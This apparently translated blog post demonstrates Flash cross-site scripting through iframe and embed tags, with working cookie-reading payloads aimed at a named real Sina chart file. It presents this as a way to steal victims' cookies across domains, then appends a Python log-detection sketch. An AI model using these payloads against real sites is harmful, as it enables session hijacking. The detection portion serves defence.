When I tested WEBQQ yesterday, I used this and went back to test it locally.
----------------------------------------------------
Create a page on localhost and run the following tests.
When a traditional reflected XSS is loaded through an iframe, the framed page is caught by the IE9 XSS filter and the script is not executed.
<Code>
<iframe/src="http://xsst.sinaapp.com/example/1-1.php?page=<script>alert(document.cookie)</script>">
</Code>
If an ordinary embed tag is used to load the Flash file instead, the alert shows the localhost cookies, that is, the cookies of the current test page.
Test this in IE; Chrome will crash.
<Code>
<embed/src="http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()" allowscriptaccess="always"></embed>
</Code>
Embedding the Flash XSS with an iframe, however, is more interesting.
The test code is as follows (IE):
<Code>
<iframe/src="http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>
</Code>
In Chrome this may crash the browser; use the following code instead.
<Code>
<iframe/src="http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
</Code>
Run it and you will find that the cookies of the Sina domain are displayed.
------------------------------------------
Therefore, when we find a Flash XSS under the www.A.com domain,
we can use an iframe to embed the vulnerable Flash file from www.A.com in a page under the www.B.com domain.
When the victim opens www.B.com, we can successfully obtain their cookies for www.A.com!
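
On the www.A.com side, this pattern is visible in the web server's access log: a request for a .swf file whose query string carries script-like content, with a Referer on another host. The following detection sketch is an added example, not part of the original post; it assumes Combined Log Format, and the hosts, paths and log lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined Log Format: "METHOD target PROTO" status size "referer" ...
LOG_RE = re.compile(
    r'"(?:GET|POST) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')
# Script-like content that does not belong in a chart-data parameter.
SUSPICIOUS = re.compile(
    r'<script|javascript:|function\s*\(|document\.cookie|location\.href', re.I)

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_swf_requests(lines, own_host):
    """Return (path, referer_host, reason) for each suspicious .swf request."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(".swf"):
            continue
        if not SUSPICIOUS.search(decode(url.query)):
            continue
        ref_host = urlsplit(m.group("referer")).hostname or ""
        cross = bool(ref_host) and ref_host != own_host
        hits.append((url.path, ref_host,
                     "cross-domain embed" if cross else "direct or same-site"))
    return hits

# Constructed sample log lines; hosts and paths are placeholders.
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2013:10:00:00 +0800] "GET /charts/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})() HTTP/1.1" 200 5120 "http://www.b.example/page.html" "Mozilla/5.0"',
    '203.0.113.6 - - [01/Jan/2013:10:00:05 +0800] "GET /charts/open-flash-chart.swf?get-data=/data/prices.json HTTP/1.1" 200 5120 "http://www.a.example/report" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2013:10:00:09 +0800] "GET /charts/open-flash-chart.swf?get-data=%2528function%2528%2529%257Blocation.href%253D1%257D%2529%2528%2529 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in flag_swf_requests(SAMPLE, "www.a.example"):
        print(hit)
```

The first sample line is the cross-domain iframe case described above; the third shows the same parameter abuse double-encoded and requested without a Referer.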